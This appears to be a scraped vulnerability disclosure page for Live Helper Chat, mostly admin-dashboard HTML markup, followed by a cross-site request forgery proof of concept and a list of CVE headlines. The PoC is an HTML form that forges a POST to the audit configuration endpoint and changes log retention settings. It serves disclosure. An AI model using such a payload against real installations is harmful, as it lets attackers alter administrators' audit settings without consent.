btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">Users</button><ul class="dropdown-menu dropdown-lhc" role="menu"><li class="p-1"><input type="text" data-stopPropagation="true" ng-model="lhc.userFilterText" placeholder="Search for operator" class="form-control form-control-sm" value=""></li><li ng-repeat="userItem in lhc.userList" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.activeu" checklist-change="lhc.productChanged('activeu')" checklist-value="userItem.id"><i title="User" class="material-icons">account_box</i>{{userItem.name || userItem.name_official}}</label></li><li ng-show="lhc.userGroups.length > 0" class="border-top"></li><li ng-repeat="userGroup in lhc.userGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.actived_ugroups" checklist-change="lhc.productChanged('actived_ugroups')" checklist-value="userGroup.id"><i title="User group" class="material-icons">people</i>{{userGroup.name}}</label></li></ul></div></div><div class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limita" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table"><thead><tr><th width="40%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','loc_dsc','loc_asc',true)"><i title="Location" class="material-icons">&#xE0C8;</i><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'loc_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'loc_dsc')}" title="Sort by location" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'loc_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'loc_asc' ? 'trending_up' : 'trending_down'}}</i></a>&nbsp;&nbsp;&nbsp;<a ng-click="lhc.toggleWidgetSort('active_chats_sort','u_dsc','u_asc',true)"><i title="Visitor" class="material-icons">face</i><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'u_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'u_dsc')}" title="Sort by visitor nick" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'u_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'u_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="20%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','lmt_dsc','lmt_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'lmt_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'lmt_dsc')}" title="Sort by last message time" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'lmt_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'lmt_asc' ? 'trending_up' : 'trending_down'}}</i></a><a ng-click="lhc.toggleWidgetSort('active_chats_sort','id_dsc','id_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'id_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'id_dsc')}" title="Sort by chat start time" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'id_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'id_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','op_dsc','op_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'op_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'op_dsc')}" title="Sort by operator" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'op_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'op_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','dep_dsc','dep_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'dep_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'dep_dsc')}" title="Sort by department" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'dep_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'dep_asc' ? 'trending_up' : 'trending_down'}}</i></a></th></tr></thead><tr ng-repeat="chat in active_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a title="[{{chat.id}}] {{chat.time_created_front}}" ng-click="lhc.previewChat(chat.id, $event)" class="material-icons">info_outline</a><i class="material-icons" title="Offline request" ng-show="chat.status_sub == 7">mail</i><i title="Has unread messages" ng-if="chat.hum" class="material-icons text-danger">feedback</i><span ng-if="chat.status_sub == 100"><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" />&nbsp;</span><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="Chat started at - {{chat.time_created_front}}"><span class="material-icons text-success" title="Receive or send indicator and time since it happened" ng-class="{'text-danger' : chat.pnd_rsp}"}>{{chat.pnd_rsp === true ? 'call_received' : 'call_made'}}</span>{{chat.last_msg_time_front ? chat.last_msg_time_front : '&#x2709;'}}</div></td><td><div class="abbr-list" title="{{chat.n_off_full}} | {{chat.plain_user_name}}">{{chat.n_office}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}"><a class="text-primary" ng-click="lhc.openModal('statistic/departmentstats/'+chat.dep_id,$event)"><i class="material-icons">donut_large</i>{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</a></div></td></tr></table><div ng-if="active_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div></div><div class="card-header" ng-if="unread_chats.list.length > 0"><a class="title-card-header" href="/site_admin/chat/list/(hum)/1"><i class="material-icons chat-unread">chat</i>Unread messages ({{unread_chats.list.length}}{{unread_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('unread_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{unread_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div ng-if="unread_chats_expanded == true" id="right-unread-chats"><table class="table table-sm mb-0 table-small table-fixed list-chat-table" ng-if="unread_chats.list.length > 0"><thead><tr><th width="50%"><i title="Visitor" class="material-icons">face</i></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="30%"><i title="Time ago" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in unread_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a ng-click="lhc.previewChat(chat.id,$event)" class="material-icons">info_outline</a> {{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.unread_time.hours}} h. {{chat.unread_time.minits}} m. {{chat.unread_time.seconds}} s. ago.">{{chat.unread_time.hours}} h. {{chat.unread_time.minits}} m. {{chat.unread_time.seconds}} s. ago.</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}">{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table><div ng-if="unread_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div><div ng-if="bot_chats" class="" data-panel-id="bot_chats" ng-init="lhc.getToggleWidget('botc_widget_exp');lhc.getToggleWidgetSort('bot_chats_sort')"><div class="card-header"><i class="material-icons mr-0 action-image" onclick="return lhc.revealModal({'url':WWW_DIR_JAVASCRIPT +'genericbot/notifications'})">settings_applications</i><a class="title-card-header" href="/site_admin/chat/list/(chat_status_ids)/5"><i class="material-icons chat-active">android</i> Bot chats ({{bot_chats.list.length}}{{bot_chats.list.length == lhc.limitb ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleWidget('botc_widget_exp')" class="fs24 float-right material-icons exp-cntr">{{lhc.toggleWidgetData['botc_widget_exp'] == false ? 'expand_less' : 'expand_more'}}</a></div><div ng-if="lhc.toggleWidgetData['botc_widget_exp'] !== true"><div class="p-2"><div class="row"><div class="col-10 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.botd.length == 0 ? "All departments" : (lhc.botd.length == 1 && true ? lhc.botdNames.join(", ") : '['+lhc.botd.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('botd',true)" type="checkbox" ng-model="lhc.botd_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.botd_products" checklist-change="lhc.productChanged('botd_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.botd_dpgroups" checklist-change="lhc.productChanged('botd_dpgroups')" checklist-value="department.id"><i title="Department group" class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.botd_only_explicit_online == true && department.oexp == false) || (lhc.botd_hide_hidden == true && department.hidden == true) || (lhc.botd_hide_disabled == true && department.disabled == true) || (lhc.botd_only_online == true && department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.botd" checklist-change="lhc.departmentChanged('botd')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limitb" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div ng-if="bot_chats.list.length > 0" class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table"><thead><tr><th width="40%"><i title="Visitor" class="material-icons">face</i></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="25%"><i title="Time ago" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in bot_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a title="[{{chat.id}}] {{chat.time_created_front}}" ng-click="lhc.previewChat(chat.id, $event)" class="material-icons">info_outline</a><i class="material-icons" title="Offline request" ng-show="chat.status_sub == 7">mail</i><span ng-if="chat.status_sub == 100"><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" />&nbsp;</span><span title="Number of messages by user">[{{chat.msg_v || 0}}]</span>&nbsp;<i title="More than {{lhc.bot_st.msg_nm}} user messages" ng-show="chat.msg_v > lhc.bot_st.msg_nm" class="material-icons text-warning">whatshot</i><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.time_created_front}}">{{chat.time_created_front}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}">{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table></div><div ng-if="bot_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Bot chats will appear here....</div></div></div></div></div></div></div></div><div class="p-1 border-top" translate="no"><p class="float-right small"><a target="_blank" rel="noreferrer" href="http://livehelperchat.com">Live Helper Chat &copy; 2022</a></p>
<p class="small"><a rel="noreferrer" href="http://livehelperchat.com">Live Helper Chat</a></p>
</div><script type="text/javascript" src="/design/defaulttheme/js/js_static/55ece73a8d637ed105f7df02bf7597c8.js?1641801573"></script></body></html>

POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.livehelperchat.com/site_admin/audit/configuration" method="POST">
      <input type="hidden" name="csfr&#95;token" value="" />
      <input type="hidden" name="days&#95;log" value="90" />
      <input type="hidden" name="log&#95;js" value="on" />
      <input type="hidden" name="StoreOptions" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability is capable of tricking the admin in changing audit log configuration.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE